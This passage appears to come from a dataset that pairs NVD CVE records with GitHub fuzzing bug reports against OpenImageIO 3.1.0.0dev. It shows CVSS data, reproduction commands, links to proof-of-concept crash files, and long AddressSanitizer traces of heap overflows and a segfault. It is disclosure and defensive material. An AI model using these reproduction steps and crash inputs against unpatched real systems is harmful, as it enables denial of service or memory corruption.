#3 0x7fade29463f7 in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/11/bits/stl_vector.h:346
#4 0x7fade29463f7 in std::vector<unsigned char, std::allocator<unsigned char> >::_M_default_append(unsigned long) /usr/include/c++/11/bits/vector.tcc:635
#5 0x7fade2e08878 in std::vector<unsigned char, std::allocator<unsigned char> >::resize(unsigned long) /usr/include/c++/11/bits/stl_vector.h:940
#6 0x7fade2e08878 in OpenImageIO_v3_1_0::JpgInput::read_icc_profile(jpeg_decompress_struct*, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:423
#7 0x7fade2e10fd3 in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:363
#8 0x7fade2e1544c in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&, OpenImageIO_v3_1_0::ImageSpec const&) /openimageio/src/jpeg.imageio/jpeginput.cpp:162
#9 0x7fade2911740 in OpenImageIO_v3_1_0::ImageInput::create(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, bool, OpenImageIO_v3_1_0::ImageSpec const*, OpenImageIO_v3_1_0::Filesystem::IOProxy*, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/libOpenImageIO/imageioplugin.cpp:746
#10 0x7fade2bd24bb in OpenImageIO_v3_1_0::ImageCacheFile::open(OpenImageIO_v3_1_0::ImageCachePerThreadInfo*) /openimageio/src/libtexture/imagecache.cpp:509
#11 0x7fade2be5b5b in OpenImageIO_v3_1_0::ImageCacheImpl::verify_file(OpenImageIO_v3_1_0::ImageCacheFile*, OpenImageIO_v3_1_0::ImageCachePerThreadInfo*, bool) /openimageio/src/libtexture/imagecache.cpp:1341
#12 0x7fade2c07770 in OpenImageIO_v3_1_0::ImageCacheImpl::get_image_info(OpenImageIO_v3_1_0::ImageCacheFile*, OpenImageIO_v3_1_0::ImageCachePerThreadInfo*, int, int, OpenImageIO_v3_1_0::ustring, OpenImageIO_v3_1_0::TypeDesc, void*) /openimageio/src/libtexture/imagecache.cpp:2760
#13 0x7fade2c0ecad in OpenImageIO_v3_1_0::ImageCacheImpl::get_image_info(OpenImageIO_v3_1_0::ustring, int, int, OpenImageIO_v3_1_0::ustring, OpenImageIO_v3_1_0::TypeDesc, void*) /openimageio/src/libtexture/imagecache.cpp:2738
#14 0x7fade2c0ecad in OpenImageIO_v3_1_0::ImageCache::get_image_info(OpenImageIO_v3_1_0::ustring, int, int, OpenImageIO_v3_1_0::ustring, OpenImageIO_v3_1_0::TypeDesc, void*) /openimageio/src/libtexture/imagecache.cpp:4261
#15 0x563dbe959651 in input_file /openimageio/src/oiiotool/oiiotool.cpp:5113
#16 0x563dbea0ff93 in std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>::operator()(OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /usr/include/c++/11/bits/std_function.h:590
#17 0x563dbea0ff93 in OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}::operator()(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /openimageio/src/include/OpenImageIO/argparse.h:536
#18 0x563dbea0ff93 in void std::__invoke_impl<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >(std::__invoke_other, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/invoke.h:61
#19 0x563dbea0ff93 in std::enable_if<is_invocable_r_v<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >, void>::type std::__invoke_r<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >(OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/invoke.h:111
#20 0x563dbea0ff93 in std::_Function_handler<void (OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>), OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}>::_M_invoke(std::_Any_data const&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/std_function.h:290
#21 0x7fade141b84f in std::function<void (OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>::operator()(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /usr/include/c++/11/bits/std_function.h:590
#22 0x7fade141b84f in OpenImageIO_v3_1_0::ArgParse::Impl::parse_args(int, char const**) /openimageio/src/libutil/argparse.cpp:535
#23 0x7fade141e2db in OpenImageIO_v3_1_0::ArgParse::parse_args(int, char const**) /openimageio/src/libutil/argparse.cpp:429
#24 0x563dbea0101b in OpenImageIO_v3_1_0::OiioTool::Oiiotool::getargs(int, char**) /openimageio/src/oiiotool/oiiotool.cpp:6979
#25 0x563dbe7865a1 in main /openimageio/src/oiiotool/oiiotool.cpp:7338
#26 0x7fade0e7dd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
SUMMARY: AddressSanitizer: heap-buffer-overflow /openimageio/src/include/OpenImageIO/detail/farmhash.h:291 in OpenImageIO_v3_1_0::farmhash::inlined::Fetch64(char const*)
Shadow bytes around the buggy address:
0x0c3e7fff8d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fff8d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fff8da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fff8db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fff8dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3e7fff8dd0: 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa
0x0c3e7fff8de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3e7fff8df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3e7fff8e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3e7fff8e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3e7fff8e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==656739==ABORTING
```
### Environment
```
ubuntu:22.04
gcc version 11.4.0 (Ubuntu 11.4.0-1ubuntu1~22.04)
clang version 14.0.0-1ubuntu1.1
afl-fuzz++4.22a
```
*Thanks* *for* *your* *time*! | [BUG]heap-buffer-overflow at src/include/OpenImageIO/detail/farmhash.h in OpenImageIO_v3_1_0::farmhash::inlined::Fetch64(char const*) in openimageio | https://api.github.com/repos/AcademySoftwareFoundation/OpenImageIO/issues/4550/comments | 1 | 2024-12-02T11:09:38Z | 2025-01-04T00:20:24Z | https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4550 | 2,711,531,628 | 4,550 | 6,517 |
CVE-2024-55193 | 2025-01-23T22:15:14.453 | OpenImageIO v3.1.0.0dev was discovered to contain a segmentation violation via the component /OpenImageIO/string_view.h. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4551"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openimageio:openimageio:3.1.0.0:dev:*:*:*:*:*:*",
"matchCriteriaId": "7AD65390-203E-40E5-ACA9-2D0C8A0A8613",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4551 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"AcademySoftwareFoundation",
"OpenImageIO"
] | ### Description
Dear developers,
We discovered a Segmentation-violation bug in src/include/OpenImageIO/string_view.h:262 while fuzzing iconvert.
The latest version also has this vulnerability.
### Version
```shell
# ./bin/oiiotool --version
3.1.0.0dev
# ./bin/iconvert -v
iconvert: Must have both an input and output filename specified.
iconvert -- copy images with format conversions and other alterations
OpenImageIO 3.1.0.0dev http://www.openimageio.org
```
### PoC
poc2iconvert: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc2iconvert
### Reproduction
```shell
git clone https://github.com/AcademySoftwareFoundation/OpenImageIO.git openimageio
cd openimageio
mkdir build1
cd build1
CFLAGS="-g3 -fsanitize=address -O0 -fno-omit-frame-pointer" CXXFLAGS="-g3 -fsanitize=address -O0 -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE_CXX_STANDARD=17 -DOpenImageIO_BUILD_MISSING_DEPS=all
make -j20
./bin/iconvert -g 0.7 --separate --rotccw poc2iconvert tmp.png
```
### Address Sanitizer log
```
=================================================================
==659943==ERROR: AddressSanitizer: SEGV on unknown address 0x61f100014fbc (pc 0x7f26e1af481e bp 0x7fff7fa986f0 sp 0x7fff7fa97e68 T0)
==659943==The signal is caused by a READ memory access.
#0 0x7f26e1af481e (/lib/x86_64-linux-gnu/libc.so.6+0x1ae81e)
#1 0x7f26e5fce2e9 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:881
#2 0x7f26e5fcebc6 in __interceptor_memcmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:892
#3 0x7f26e5fcebc6 in __interceptor_memcmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:887
#4 0x7f26e31f346d in std::char_traits<char>::compare(char const*, char const*, unsigned long) /usr/include/c++/11/bits/char_traits.h:389
#5 0x7f26e31f346d in OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >::compare(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) const /openimageio/src/include/OpenImageIO/string_view.h:262
#6 0x7f26e31f346d in OpenImageIO_v3_1_0::operator==(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/include/OpenImageIO/string_view.h:393
#7 0x7f26e31f346d in OpenImageIO_v3_1_0::decode_icc_profile(OpenImageIO_v3_1_0::span<unsigned char const, 18446744073709551615ul>, OpenImageIO_v3_1_0::ImageSpec&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) /openimageio/src/libOpenImageIO/icc.cpp:319
#8 0x7f26e38fa7eb in OpenImageIO_v3_1_0::JpgInput::read_icc_profile(jpeg_decompress_struct*, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:438
#9 0x7f26e3902fd3 in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&) /openimageio/src/jpeg.imageio/jpeginput.cpp:363
#10 0x7f26e390744c in OpenImageIO_v3_1_0::JpgInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec&, OpenImageIO_v3_1_0::ImageSpec const&) /openimageio/src/jpeg.imageio/jpeginput.cpp:162
#11 0x7f26e3403740 in OpenImageIO_v3_1_0::ImageInput::create(OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, bool, OpenImageIO_v3_1_0::ImageSpec const*, OpenImageIO_v3_1_0::Filesystem::IOProxy*, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >) /openimageio/src/libOpenImageIO/imageioplugin.cpp:746
#12 0x7f26e337f1d4 in OpenImageIO_v3_1_0::ImageInput::open(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, OpenImageIO_v3_1_0::ImageSpec const*, OpenImageIO_v3_1_0::Filesystem::IOProxy*) /openimageio/src/libOpenImageIO/imageinput.cpp:154
#13 0x5572d54cb97e in convert_file /openimageio/src/iconvert/iconvert.cpp:333
#14 0x5572d54ba80d in main /openimageio/src/iconvert/iconvert.cpp:525
#15 0x7f26e196fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#16 0x7f26e196fe3f in __libc_start_main_impl ../csu/libc-start.c:392
#17 0x5572d54bb4b4 in _start (/openimageio/build1/bin/iconvert+0xc4b4)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x1ae81e)
==659943==ABORTING
```
### Environment
```
ubuntu:22.04
gcc version 11.4.0 (Ubuntu 11.4.0-1ubuntu1~22.04)
clang version 14.0.0-1ubuntu1.1
afl-fuzz++4.22a
```
*Thanks* *for* *your* *time*! | [BUG]Segmentation-violation bug at src/include/OpenImageIO/string_view.h:262 in openimageio | https://api.github.com/repos/AcademySoftwareFoundation/OpenImageIO/issues/4551/comments | 2 | 2024-12-02T11:11:13Z | 2024-12-05T22:37:11Z | https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4551 | 2,711,536,469 | 4,551 | 6,518 |
CVE-2024-55194 | 2025-01-23T22:15:14.560 | OpenImageIO v3.1.0.0dev was discovered to contain a heap overflow via the component /OpenImageIO/fmath.h. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4552"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4552"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openimageio:openimageio:3.1.0.0:dev:*:*:*:*:*:*",
"matchCriteriaId": "7AD65390-203E-40E5-ACA9-2D0C8A0A8613",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/4552 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"AcademySoftwareFoundation",
"OpenImageIO"
] | ### Description
Dear developers,
We discovered a heap overflow bug in src/include/OpenImageIO/fmath.h:983 while fuzzing oiiotool.
The latest version also has this vulnerability.
### Version
```shell
# ./bin/oiiotool --version
3.1.0.0dev
# ./bin/iconvert -v
iconvert: Must have both an input and output filename specified.
iconvert -- copy images with format conversions and other alterations
OpenImageIO 3.1.0.0dev http://www.openimageio.org
```
### PoC
poc2oiio: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc2oiio
### Reproduction
```shell
git clone https://github.com/AcademySoftwareFoundation/OpenImageIO.git openimageio
cd openimageio
mkdir build1
cd build1
CFLAGS="-g3 -fsanitize=address -O0 -fno-omit-frame-pointer" CXXFLAGS="-g3 -fsanitize=address -O0 -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE_CXX_STANDARD=17 -DOpenImageIO_BUILD_MISSING_DEPS=all
make -j20
./bin/oiiotool -i poc2oiio --autotrim --printstats -o tmp5.jpg
```
### Address Sanitizer log
```
=================================================================
==660139==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000546f8 at pc 0x7f85c4197284 bp 0x7ffe23c547b0 sp 0x7ffe23c547a0
READ of size 4 at 0x6020000546f8 thread T0
#0 0x7f85c4197283 in float OpenImageIO_v3_1_0::convert_type<float, float>(float const&) /openimageio/src/include/OpenImageIO/fmath.h:983
#1 0x7f85c4197283 in OpenImageIO_v3_1_0::ConstDataArrayProxy<float, float>::operator[](int) const /openimageio/src/include/OpenImageIO/fmath.h:1218
#2 0x7f85c4197283 in OpenImageIO_v3_1_0::ImageBuf::ConstIterator<float, float>::operator[](int) const /openimageio/src/include/OpenImageIO/imagebuf.h:1883
#3 0x7f85c4197283 in operator() /openimageio/src/libOpenImageIO/imagebufalgo_compare.cpp:169
#4 0x7f85c37043f0 in std::function<void (long, long)>::operator()(long, long) const /usr/include/c++/11/bits/std_function.h:590
#5 0x7f85c37043f0 in operator() /openimageio/src/libutil/thread.cpp:647
#6 0x7f85c37043f0 in __invoke_impl<void, OpenImageIO_v3_1_0::parallel_for_chunked(int64_t, int64_t, int64_t, std::function<void(long int, long int)>&&, OpenImageIO_v3_1_0::paropt)::<lambda(int, int64_t, int64_t)>&, int, long int, long int> /usr/include/c++/11/bits/invoke.h:61
#7 0x7f85c37043f0 in __invoke_r<void, OpenImageIO_v3_1_0::parallel_for_chunked(int64_t, int64_t, int64_t, std::function<void(long int, long int)>&&, OpenImageIO_v3_1_0::paropt)::<lambda(int, int64_t, int64_t)>&, int, long int, long int> /usr/include/c++/11/bits/invoke.h:111
#8 0x7f85c37043f0 in _M_invoke /usr/include/c++/11/bits/std_function.h:290
#9 0x7f85c37117e5 in std::function<void (int, long, long)>::operator()(int, long, long) const /usr/include/c++/11/bits/std_function.h:590
#10 0x7f85c37117e5 in OpenImageIO_v3_1_0::parallel_for_chunked_id(long, long, long, std::function<void (int, long, long)>&&, OpenImageIO_v3_1_0::paropt) /openimageio/src/libutil/thread.cpp:632
#11 0x7f85c3713b49 in OpenImageIO_v3_1_0::parallel_for_chunked(long, long, long, std::function<void (long, long)>&&, OpenImageIO_v3_1_0::paropt) /openimageio/src/libutil/thread.cpp:648
#12 0x7f85c41f1957 in computePixelStats_<float> /openimageio/src/libOpenImageIO/imagebufalgo_compare.cpp:161
#13 0x7f85c41f1957 in OpenImageIO_v3_1_0::ImageBufAlgo::computePixelStats(OpenImageIO_v3_1_0::ImageBuf const&, OpenImageIO_v3_1_0::ROI, int) /openimageio/src/libOpenImageIO/imagebufalgo_compare.cpp:203
#14 0x7f85c4b7ca1a in OpenImageIO_v3_1_0::pvt::print_stats(std::ostream&, OpenImageIO_v3_1_0::basic_string_view<char, std::char_traits<char> >, OpenImageIO_v3_1_0::ImageBuf const&, OpenImageIO_v3_1_0::ImageSpec const&, OpenImageIO_v3_1_0::ROI, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) /openimageio/src/libOpenImageIO/printinfo.cpp:324
#15 0x5644114bd151 in print_info_subimage /openimageio/src/oiiotool/printinfo.cpp:470
#16 0x5644114c72a7 in OpenImageIO_v3_1_0::OiioTool::print_info(std::ostream&, OpenImageIO_v3_1_0::OiioTool::Oiiotool&, OpenImageIO_v3_1_0::OiioTool::ImageRec*, OpenImageIO_v3_1_0::pvt::print_info_options const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) /openimageio/src/oiiotool/printinfo.cpp:529
#17 0x5644112ad943 in action_printstats /openimageio/src/oiiotool/oiiotool.cpp:5820
#18 0x564411388f93 in std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>::operator()(OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /usr/include/c++/11/bits/std_function.h:590
#19 0x564411388f93 in OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}::operator()(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /openimageio/src/include/OpenImageIO/argparse.h:536
#20 0x564411388f93 in void std::__invoke_impl<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >(std::__invoke_other, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/invoke.h:61
#21 0x564411388f93 in std::enable_if<is_invocable_r_v<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >, void>::type std::__invoke_r<void, OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul> >(OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/invoke.h:111
#22 0x564411388f93 in std::_Function_handler<void (OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>), OpenImageIO_v3_1_0::ArgParse::Arg::action(std::function<void (OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>&&)::{lambda(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)#1}>::_M_invoke(std::_Any_data const&, OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>&&) /usr/include/c++/11/bits/std_function.h:290
#23 0x7f85c34e0abc in std::function<void (OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>)>::operator()(OpenImageIO_v3_1_0::ArgParse::Arg&, OpenImageIO_v3_1_0::span<char const* const, 18446744073709551615ul>) const /usr/include/c++/11/bits/std_function.h:590
#24 0x7f85c34e0abc in OpenImageIO_v3_1_0::ArgParse::Impl::parse_args(int, char const**) /openimageio/src/libutil/argparse.cpp:514
#25 0x7f85c34e42db in OpenImageIO_v3_1_0::ArgParse::parse_args(int, char const**) /openimageio/src/libutil/argparse.cpp:429
#26 0x56441137a01b in OpenImageIO_v3_1_0::OiioTool::Oiiotool::getargs(int, char**) /openimageio/src/oiiotool/oiiotool.cpp:6979
#27 0x5644110ff5a1 in main /openimageio/src/oiiotool/oiiotool.cpp:7338
#28 0x7f85c2f43d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#29 0x7f85c2f43e3f in __libc_start_main_impl ../csu/libc-start.c:392
#30 0x564411104b34 in _start (/openimageio/build1/bin/oiiotool+0x89b34)
0x6020000546f9 is located 0 bytes to the right of 9-byte region [0x6020000546f0,0x6020000546f9)
allocated by thread T0 here:
#0 0x7f85c75c4357 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:102
#1 0x7f85c4808f77 in OpenImageIO_v3_1_0::ImageBufImpl::new_pixels(unsigned long, void const*) /openimageio/src/libOpenImageIO/imagebuf.cpp:682
#2 0x7f85c480b273 in OpenImageIO_v3_1_0::ImageBufImpl::realloc() /openimageio/src/libOpenImageIO/imagebuf.cpp:998
